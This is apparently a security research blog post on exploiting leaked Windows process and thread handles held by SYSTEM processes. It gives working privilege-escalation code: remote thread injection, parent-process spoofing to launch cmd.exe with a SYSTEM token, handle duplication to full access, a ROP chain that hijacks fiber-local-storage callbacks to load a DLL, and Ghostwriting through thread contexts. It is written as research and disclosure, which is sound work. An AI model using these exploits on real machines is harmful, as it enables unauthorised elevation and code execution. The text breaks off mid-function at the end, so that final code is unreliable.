Exploiting Leaked Process and Thread Handles
Over the years I’ve seen and exploited the occasional leaked handle bug. These can be
particularly fun to toy with, as the handles aren’t always granted
PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity.
This post will address the various access rights assignable to handles and what we
can do to exploit them to gain elevated code execution. I’ve chosen to focus
specifically on process and thread handles as these seem to be the most common,
but surely other objects can be exploited in a similar manner.
As background, while this bug can occur under various circumstances, I’ve most
commonly seen it manifest when some privileged process opens a handle with
bInheritHandle set to true. Once this happens, any child process that the
privileged process creates with handle inheritance enabled inherits the handle
and all access it grants. As an example, assume a SYSTEM level process does this:
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
Since the handle is opened as inheritable, any child process created with handle inheritance enabled will gain access to it. If those children execute userland code impersonating the desktop user, as a service might often do, those userland processes will have access to that handle.
Existing bugs
There are several public bugs we can point to over the years as examples and
inspiration. As per usual, James Forshaw has a fun one from 2016[0] in which
he’s able to leak a privileged thread handle out of the secondary logon
service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but
he exploited it in a novel way that I was unaware of at the time.
Another one from Ivan Fratric exploited[1] a leaked process handle with
PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing
Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he
identifies the JIT server process mapping memory into the content process. To
do this, the JIT process needs a handle to the content process. The content
process supplies one by calling DuplicateHandle on itself, for which it holds
a handle to the JIT process with PROCESS_DUP_HANDLE; that handle can be
exploited to obtain a full access handle.
A more recent example is a Dell LPE[2] in which a THREAD_ALL_ACCESS handle
was obtained from a privileged process. They were able to exploit this via a
dropped DLL and an APC.
Setup
In this post, I wanted to examine all possible access rights to determine which were exploitable on their own and which were not. Of those that were not, I tried to determine what combination of rights was necessary to make them so. I’ve tried to stay “realistic” here in my experience, but you never know what you’ll find in the wild, and this post reflects that.
For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:
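#include "pch.h"
#include <iostream>
#include <Windows.h>

int main(int argc, char **argv)
{
    if (argc <= 1) {
        printf("[-] Please give me a target PID\n");
        return -1;
    }

    HANDLE hUserToken, hUserProcess;
    HANDLE hProcess;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    // open the unprivileged user's process so we can borrow its token
    hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, atoi(argv[1]));
    if (hUserProcess == NULL) {
        printf("[-] Failed to open user process: %lu\n", GetLastError());
        return -1;
    }

    if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
        printf("[-] Failed to open user token: %lu\n", GetLastError());
        CloseHandle(hUserProcess);
        return -1;
    }

    // the bug: an inheritable, full access handle to ourselves
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
    printf("[+] Process: %p\n", hProcess);

    // bInheritHandles = TRUE leaks hProcess into the child
    if (!CreateProcessAsUserA(hUserToken,
                              "VulnServiceClient.exe",
                              NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        printf("[-] Failed to spawn client: %lu\n", GetLastError());
        return -1;
    }

    // park our own thread so the server (and the leaked handle) stays alive
    SuspendThread(GetCurrentThread());
    return 0;
}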
In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.
The client is, of course, a little more involved. The only component that needs
a little discussion up front is fetching the leaked handle. This can be done
via NtQuerySystemInformation and does not require any special privileges:
void ProcessHandles()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject =
        (_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
    _NtQueryObject NtQueryObject =
        (_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    _RtlEqualUnicodeString RtlEqualUnicodeString =
        (_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
    _RtlInitUnicodeString RtlInitUnicodeString =
        (_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    ULONG handleInfoSize = 0x10000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    DWORD dwPid = GetCurrentProcessId();

    printf("[+] Looking for process handles...\n");

    // grow the buffer until the whole system handle table fits
    while ((status = NtQuerySystemInformation(
        SystemHandleInformation,
        phHandleInfo,
        handleInfoSize,
        NULL
    )) == STATUS_INFO_LENGTH_MISMATCH)
        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);

    if (status != STATUS_SUCCESS)
    {
        printf("NtQuerySystemInformation failed!\n");
        free(phHandleInfo);
        return;
    }

    printf("[+] Fetched %lu handles\n", phHandleInfo->HandleCount);

    // iterate handles until we find the privileged process
    for (ULONG i = 0; i < phHandleInfo->HandleCount; ++i)
    {
        SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
        POBJECT_TYPE_INFORMATION objectTypeInfo;
        PVOID objectNameInfo;
        UNICODE_STRING objectName;
        ULONG returnLength;

        // only consider handles in our own handle table (i.e. the inherited ones)
        if (handle.ProcessId != dwPid)
            continue;

        objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectTypeInformation,
            objectTypeInfo,
            0x1000,
            NULL
        ) != STATUS_SUCCESS)
        {
            free(objectTypeInfo);
            continue;
        }

        // handles with this access mask are conventionally skipped, as
        // querying their name can hang
        if (handle.GrantedAccess == 0x0012019f)
        {
            free(objectTypeInfo);
            continue;
        }

        objectNameInfo = malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectNameInformation,
            objectNameInfo,
            0x1000,
            &returnLength
        ) != STATUS_SUCCESS)
        {
            // retry with the size the first call reported
            objectNameInfo = realloc(objectNameInfo, returnLength);
            if (NtQueryObject(
                (HANDLE)handle.Handle,
                ObjectNameInformation,
                objectNameInfo,
                returnLength,
                NULL
            ) != STATUS_SUCCESS)
            {
                free(objectTypeInfo);
                free(objectNameInfo);
                continue;
            }
        }

        // check if we've got a process object; there should only be one, but should we
        // have multiple, this is where we'd perform the checks
        objectName = *(PUNICODE_STRING)objectNameInfo;
        UNICODE_STRING pProcess, pThread;
        RtlInitUnicodeString(&pThread, L"Thread");
        RtlInitUnicodeString(&pProcess, L"Process");

        if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
            printf("[+] Found process handle (%x)\n", handle.Handle);
            HANDLE hProcess = (HANDLE)handle.Handle;
            // hand hProcess to the exploit routine for the right being tested
        }
        else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
            printf("[+] Found thread handle (%x)\n", handle.Handle);
            HANDLE hThread = (HANDLE)handle.Handle;
            // hand hThread to the exploit routine for the right being tested
        }

        // release the per-handle buffers whether or not we matched
        free(objectTypeInfo);
        free(objectNameInfo);
    }

    free(phHandleInfo);
}
We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.
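To make the “filter down further” point a little more concrete, here is a minimal, platform-independent sketch of the selection logic. HandleEntry and FilterHandles are hypothetical names standing in for the SYSTEM_HANDLE rows and the loop above, and the requiredAccess check is only an assumption about how one might narrow the candidates in a busier process; the test client does not do this.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical, simplified stand-in for one row of the system handle table.
struct HandleEntry {
    uint32_t    pid;            // owning process
    uint16_t    handle;         // handle value in that process
    uint32_t    grantedAccess;  // access mask granted to the handle
    std::string typeName;       // "Process", "Thread", "File", ...
};

// Return the handles owned by `pid` whose object type matches `typeName`
// and whose granted access contains every bit in `requiredAccess`.
std::vector<uint16_t> FilterHandles(const std::vector<HandleEntry>& table,
                                    uint32_t pid,
                                    const std::string& typeName,
                                    uint32_t requiredAccess)
{
    assert(!typeName.empty());  // an empty type name can never match

    std::vector<uint16_t> matches;
    for (const HandleEntry& entry : table) {
        if (entry.pid != pid)
            continue;                                   // not our handle table
        if (entry.typeName != typeName)
            continue;                                   // wrong object type
        if ((entry.grantedAccess & requiredAccess) != requiredAccess)
            continue;                                   // missing a needed right
        matches.push_back(entry.handle);
    }
    return matches;
}
```

Passing 0 for requiredAccess reduces this to the PID and type filter used by the client; passing a mask such as 0x0040 (PROCESS_DUP_HANDLE) keeps only handles that carry that right.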
The remainder of this post will be broken down into process and thread security access rights.
Process
There are approximately 14 process-specific rights[3]. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.
Right off the bat, we’re going to dismiss the following:
PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE
To be clear I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.
That leaves the following:
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE
We’ll run through each of these individually.
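When triaging a leaked handle it helps to turn the raw GrantedAccess mask into names first. The following is a small sketch of that, not part of the test client. The bit values are the ones defined in winnt.h, reproduced so it builds without the Windows SDK; DescribeProcessAccess and HasCandidateRight are hypothetical helper names, and the table only covers the rights discussed in this post.

```cpp
#include <cassert>   // only needed for quick checks of the helpers below
#include <cstdint>
#include <string>

struct RightName { uint32_t bit; const char* name; };

// Process access rights covered in this post, with their winnt.h values.
static const RightName kProcessRights[] = {
    {0x0001,     "PROCESS_TERMINATE"},
    {0x0002,     "PROCESS_CREATE_THREAD"},
    {0x0008,     "PROCESS_VM_OPERATION"},
    {0x0010,     "PROCESS_VM_READ"},
    {0x0020,     "PROCESS_VM_WRITE"},
    {0x0040,     "PROCESS_DUP_HANDLE"},
    {0x0080,     "PROCESS_CREATE_PROCESS"},
    {0x0100,     "PROCESS_SET_QUOTA"},
    {0x0200,     "PROCESS_SET_INFORMATION"},
    {0x0400,     "PROCESS_QUERY_INFORMATION"},
    {0x0800,     "PROCESS_SUSPEND_RESUME"},
    {0x1000,     "PROCESS_QUERY_LIMITED_INFORMATION"},
    {0x00100000, "SYNCHRONIZE"},
};

// The rights this post does not dismiss up front: CREATE_THREAD, VM_WRITE,
// DUP_HANDLE, CREATE_PROCESS and SET_INFORMATION.
constexpr uint32_t kCandidateMask = 0x0002 | 0x0020 | 0x0040 | 0x0080 | 0x0200;

// Render an access mask as "NAME|NAME|..." in table order.
std::string DescribeProcessAccess(uint32_t mask)
{
    std::string out;
    for (const RightName& right : kProcessRights) {
        if (mask & right.bit) {
            if (!out.empty())
                out += "|";
            out += right.name;
        }
    }
    return out;
}

// True if the mask contains at least one right worth a closer look.
bool HasCandidateRight(uint32_t mask)
{
    return (mask & kCandidateMask) != 0;
}
```

A mask of 0x0420, for instance, decodes to PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, while 0x1400 contains only the two query rights and is not flagged as a candidate.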
PROCESS_ALL_ACCESS
The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:
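char payload[] = "\xcc\xcc";
// allocate RWX memory in the target, copy the payload in, and start a thread on it
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, 2, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, 2, NULL);
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBuf, 0, 0, NULL);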
Nothing to it.
PROCESS_CREATE_PROCESS
This right is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. This will create the new process and inherit its parent token which will hopefully be a SYSTEM token.
Here’s how we do that:
STARTUPINFOEXA sinfo = { sizeof(sinfo) };
PROCESS_INFORMATION pinfo;
LPPROC_THREAD_ATTRIBUTE_LIST ptList = NULL;
SIZE_T bytes = 0;

sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// the first call reports the required size, the second initializes the list
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);

// hPrivProc is the leaked handle; it becomes the parent of the new process
UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hPrivProc, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;

// lpApplicationName is NULL so that cmd.exe is resolved via the search path
CreateProcessA(NULL, (LPSTR)"cmd.exe /c calc.exe",
    NULL, NULL, TRUE,
    EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
    &sinfo.StartupInfo, &pinfo);

DeleteProcThreadAttributeList(ptList);
free(ptList);
We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!
PROCESS_CREATE_THREAD
Here we’ve got the ability to use CreateRemoteThread, but can’t control any
memory in the target process. There are of course ways we can influence memory
without direct write access, such as WNF, but we’d still have no way of
resolving those addresses. As it turns out, however, we don’t need the control.
CreateRemoteThread can be pointed at a function with a single argument, which
gives us quite a bit of control. LoadLibraryA and WinExec are both great
candidates for executing child processes or loading arbitrary code.
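As an example, there’s an ANSI cmd.exe string located in msvcrt.dll at offset
0x503b8 (this offset varies between msvcrt.dll builds). Since system DLLs are
mapped at the same base address across processes for a given boot, we can
resolve the address locally, provided the target also has msvcrt.dll loaded.
We can pass this as an argument to CreateRemoteThread and trigger a WinExec
call to pop a shell: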
// resolve the string locally; DWORD_PTR keeps the full address on x64
DWORD_PTR dwCmd = (DWORD_PTR)GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x503b8;
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
    (LPTHREAD_START_ROUTINE)WinExec,
    (LPVOID)dwCmd,
    0, NULL);
We can do something similar for LoadLibraryA. This of course is predicated on
the system path containing a writable directory for our user.
PROCESS_DUP_HANDLE
Microsoft’s own documentation on process security and access rights points to
this specifically as a sensitive right. Using it, we can simply duplicate our
process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address
space. As per Ivan Fratric’s JIT bug, it’s as simple as this:
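HANDLE hDup = INVALID_HANDLE_VALUE;
// the source handle is the pseudo handle, which resolves to the privileged
// process itself when duplicated out of hPrivProc
DuplicateHandle(hPrivProc, GetCurrentProcess(), GetCurrentProcess(), &hDup, PROCESS_ALL_ACCESS, 0, 0);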
Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.
PROCESS_SET_INFORMATION
Granting this permission allows one to execute SetProcessInformation in
addition to several fields of NtSetInformationProcess. The latter is far more
powerful, but many of the PROCESSINFOCLASS fields available are either read
only or require additional privileges to actually set (SeDebugPrivilege for
ProcessExceptionPort and ProcessInstrumentationCallback (win7), for
example). Process Hacker[15] maintains an up-to-date definition of this class
and its members.
Of the available flags, none were particularly interesting on their own. I
needed to add PROCESS_VM_* privileges in order to make any usable and at
that point we defeat the purpose.
PROCESS_VM_*
This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two
should be self-explanatory and the third allows one to operate on the virtual
address space itself, such as changing page protections (VirtualProtectEx) or
allocating memory (VirtualAllocEx). I won’t address each permutation of these
three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a
necessary requirement. While PROCESS_VM_OPERATION allows us to crash the
remote process, which could open up other flaws, it’s neither a generic nor an
elegant approach. Ditto with PROCESS_VM_READ.
PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to
come up with a generic solution. At first blush, the entire set of
Shatter-like injection strategies documented by Hexacorn[12] seems like
it’d be perfect. They simply require the remote process to use windows,
clipboard registrations, etc. None of these are guaranteed, but chances are one
is bound to exist. Unfortunately for us, many of them restrict access across
sessions or scaling integrity levels. We can write into the remote process,
but we need some way to gain control over execution flow.
In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.
Using NtQuerySystemInformation, for example, we can enumerate all threads
inside a remote process regardless of its IL. This grants us a list of
SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other
things, the address of the TEB. NtQueryInformationProcess allows us to fetch
the remote process PEB address. This latter API requires the
PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major
wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION
onto PROCESS_VM_WRITE, which gives us the necessary components to pull this
off. If someone knows of a way to leak the address of a remote process PEB
without it, I’d love to hear.
The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS)[13], this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.
Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always set up a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions is taken.
With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.
Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well[14].
Gaining control over the callback was a little trickier. A pointer to a
_FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an
opaque structure. Since we can’t actually read this pointer, we have no simple
way of overwriting the pointer. Or do we?
What I ended up doing is overwriting the FlsCallback pointer itself in the PEB,
essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a
pretty simple structure and really only has one value of importance: the
callback pointer.
In addition, as per the FLS article, we also need to take control over ECX/RCX.
This will allow us to stack pivot and continue executing our ROP payload. This
requires that we update the TEB->FlsData entry which we also are unable to
do, since it’s a pointer. Much like FlsCallback, though, I was able to just
overwrite this value and craft my own data structure, which also turned out to
be pretty simple. The TLS buffer ended up looking like this:
//
// 0 ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] 41414141 41414141 41414141 41414141
//
There just so happens to be a perfect stack pivot gadget located in
kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h]
7603c41b c20400 ret 4
Putting this all together, execution results in:
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h] ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400 ret 4
0:000> dd esp l3
7ffdee30 41414141 41414141 41414141
Now we’ve got EIP and a stack pivot. Instead of marking memory executable and
running some other payload, I took a quick and lazy strategy and simply called
LoadLibraryA to load a DLL off disk from an arbitrary location. This works
well, is reliable, and even on process exit will execute and block, depending
on what you do within the DLL. Here’s the final code to achieve all this:
_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll"), "NtWriteVirtualMemory");
LPVOID lpBuf = malloc(13*sizeof(SIZE_T));
HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, dwTargetPid);
if (hProcess == NULL)
return;
SIZE_T LoadLibA = (SIZE_T)LoadLibraryA;
SIZE_T RemoteTeb = GetRemoteTeb(hProcess), TlsAddr = 0;
TlsAddr = RemoteTeb + 0xe10;
SIZE_T RemotePeb = GetRemotePeb(hProcess);
SIZE_T PivotGadget = 0x7603c415;
SIZE_T StackAddress = (TlsAddr + 28) - 0xd8;
SIZE_T RtlExitThread = (SIZE_T)GetProcAddress(GetModuleHandleA("ntdll"), "RtlExitUserThread");
SIZE_T LoadLibParam = (SIZE_T)TlsAddr + 48;
//
// construct our TlsSlots payload:
// 0 ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] [LOADLIB ADDR] 41414141 [RET ADDR] [LOADLIB ARG PTR]
// 48 ] 41414141
//
memset(lpBuf, 0x0, 16);
*((DWORD*)lpBuf + 2) = PivotGadget;
*((DWORD*)lpBuf+ 4) = 0;
*((DWORD*)lpBuf + 5) = 0;
*((DWORD*)lpBuf + 6) = StackAddress;
StackAddress = TlsAddr + 32;
*((DWORD*)lpBuf + 7) = StackAddress;
*((DWORD*)lpBuf + 8) = LoadLibA;
*((DWORD*)lpBuf + 9) = 0x41414141; // junk
*((DWORD*)lpBuf + 10) = RtlExitThread;
*((DWORD*)lpBuf + 11) = (SIZE_T)TlsAddr + 48;
*((DWORD*)lpBuf + 12) = 0x41414141; // DLL name (AAAA.dll)
NtWriteVirtualMemory(hProcess, (PVOID)TlsAddr, lpBuf, (13 * sizeof(SIZE_T)), NULL);
// update FlsCallback in PEB and FlsData in TEB
StackAddress = TlsAddr + 12;
NtWriteVirtualMemory(hProcess, (LPVOID)(RemoteTeb + 0xfb4), (PVOID)&StackAddress, sizeof(SIZE_T), NULL);
NtWriteVirtualMemory(hProcess, (LPVOID)(RemotePeb + 0x20c), (PVOID)&TlsAddr, sizeof(SIZE_T), NULL);
If all works well you should see attempts to load AAAA.dll off disk when the
callback is executed (just close the process). As a note, we’re using
NtWriteVirtualMemory here because WriteProcessMemory requires
PROCESS_VM_OPERATION, which we may not have.
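Since a single wrong offset in the TLS buffer means a crash in a SYSTEM process, it can be worth checking the layout offline before writing it anywhere. The sketch below rebuilds the same 13 dwords from the code above and then walks the mov esp,[ecx+0D8h] / ret 4 pivot by hand to confirm where execution and the LoadLibraryA argument end up. It is x86 only, touches no process at all, and the names (TlsPayload, BuildTlsPayload, SimulatePivot) are hypothetical; the addresses passed in are whatever you resolved for your own target.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

struct TlsPayload {
    std::array<uint32_t, 13> dwords{};  // contents written at TlsAddr
    uint32_t flsData = 0;               // value written to TEB->FlsData
    uint32_t flsCallback = 0;           // value written to PEB->FlsCallback
};

// Mirror of the buffer construction in the code above.
TlsPayload BuildTlsPayload(uint32_t tlsAddr, uint32_t pivotGadget,
                           uint32_t loadLibraryA, uint32_t exitThread)
{
    TlsPayload p;
    p.dwords[2]  = pivotGadget;            // [STACK PIVOT]
    p.dwords[6]  = (tlsAddr + 28) - 0xd8;  // [ECX VALUE]: ecx+0xd8 lands on dwords[7]
    p.dwords[7]  = tlsAddr + 32;           // [NEW STACK PTR]
    p.dwords[8]  = loadLibraryA;           // first return target after the pivot
    p.dwords[9]  = 0x41414141;             // junk discarded by "ret 4"
    p.dwords[10] = exitThread;             // return address seen by LoadLibraryA
    p.dwords[11] = tlsAddr + 48;           // pointer to the DLL name
    p.dwords[12] = 0x41414141;             // DLL name ("AAAA")
    p.flsData     = tlsAddr + 12;
    p.flsCallback = tlsAddr;
    return p;
}

struct PivotResult { uint32_t eip, returnAddress, argument; };

// Emulate "mov esp,[ecx+0D8h]; ret 4" against the buffer only.
PivotResult SimulatePivot(const TlsPayload& p, uint32_t tlsAddr)
{
    auto read = [&](uint32_t addr) {
        assert(addr >= tlsAddr && (addr - tlsAddr) % 4 == 0);
        return p.dwords.at((addr - tlsAddr) / 4);  // throws if outside the buffer
    };

    uint32_t ecx = p.dwords[6];
    uint32_t esp = read(ecx + 0xd8);  // mov esp, dword ptr [ecx+0D8h]
    uint32_t eip = read(esp);         // ret pops the new EIP...
    esp += 4 + 4;                     // ...and "4" discards one more dword
    return { eip, read(esp), read(esp + 4) };
}
```

With TlsAddr set to 0x7ffdee10, the ECX value comes out as 0x7ffded54 and the new stack pointer as 0x7ffdee30, which matches the debugger output shown earlier.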
Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ.
This gives us visibility into the address space, but we still cannot allocate
or map memory into the remote process. Using the above strategy we can rid
ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the
PEB address out of TEB.
Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION.
Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we
can now allocate memory and change page permissions. This allows us to more
easily use the above strategy, but also perform inline and IAT hooks.
Thread
As with the process handles, there are a handful of access rights we can dismiss immediately:
SYNCHRONIZE
THREAD_QUERY_INFORMATION
THREAD_GET_CONTEXT
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE
Which leaves the following:
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN
THREAD_ALL_ACCESS
There’s quite a lot we can do with this, including everything described in the
following thread access rights sections. I personally find the
THREAD_DIRECT_IMPERSONATION strategy to be the easiest.
There is another option that is a bit more arcane, but equally viable. Note
that this thread access doesn’t give us VM read/write privileges, so there’s
no easy way to “write” into a thread, since that doesn’t really make sense.
What we do have, however, is a series of APIs that sort of grant us that:
SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code
injection technique dubbed Ghostwriting[6] was released to little fanfare. In
it, the author describes a code injection strategy that does not require the
typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or
even OpenProcess.
While the write-up is lacking in a few departments, it’s quite a clever bit of
code. In short, the author abuses the SetThreadContext/GetThreadContext
calls in tandem with a set of specific assembly gadgets to write a payload,
dword by dword, onto the thread’s stack. Once written, they use
NtProtectVirtualMemory to mark the code RWX and redirect code flow to
their payload.
For their write gadget, they hunt for a pattern inside NTDLL:
MOV [REG1], REG2
RET
They then locate a JMP $, or jump here, which will operate as an auto lock
and infinitely loop. Once we’ve found our two gadgets, we suspend the thread.
We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP
so the return address is the JMP $, and set REG2 to the jump gadget. Here’s
my write function:
void WriteQword(CONTEXT context, HANDLE hThread, size_t WriteWhat, size_t WriteWhere)
{
    SetContextRegister(&context, g_rside, WriteWhat);
    SetContextRegister(&context, g_lside, WriteWhere);
    context.Rsp = StackBase;
    context.Rip = MovAddr;
    WaitForThreadAutoLock(hThread, &context, JmpAddr);
}
The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the
appropriate registers. Once those are set, we set our stack base (adjusted from
the thread’s RSP) and update RIP to our gadget. The first time we execute this
we’ll write our JMP $ gadget to the stack.
They use what they call a thread auto lock to control execution flow (edits mine):
void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext, HWND ThreadsWindow, DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread, PThreadContext);
    do
    {
        ResumeThread(Thread);
        Sleep(30);
        SuspendThread(Thread);
        GetThreadContext(Thread, PThreadContext);
    }
    while (PThreadContext->Eip != AutoLockTargetEIP);
}
It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the “sink” gadget has been reached.
Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.
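The interplay between the MOV gadget and the JMP $ sink is easier to see in a toy model. The following sketch emulates a suspended thread with a tiny register file and a sparse memory map. It is purely illustrative, makes no Windows calls, and the gadget addresses and the FakeThread type are made up. What it does show is why the very first write has to plant the JMP $ address at the stack base: without it, the RET after the MOV has nowhere safe to land.

```cpp
#include <cassert>   // only needed for quick checks of the helpers below
#include <cstdint>
#include <map>

// Hypothetical gadget addresses, standing in for the ones found in NTDLL.
constexpr uint64_t kMovGadget = 0x1000;  // mov [REG1], REG2 ; ret
constexpr uint64_t kJmpGadget = 0x2000;  // jmp $

struct FakeThread {
    uint64_t rip = 0, rsp = 0;
    uint64_t reg1 = 0, reg2 = 0;          // REG1 / REG2 of the MOV gadget
    std::map<uint64_t, uint64_t> memory;  // sparse, qword granular
};

// Let the "thread" run until it parks on the JMP $ sink (the auto lock).
// Returns false if execution wanders anywhere else.
bool RunUntilAutoLock(FakeThread& t, int maxSteps = 8)
{
    for (int i = 0; i < maxSteps; ++i) {
        if (t.rip == kJmpGadget)
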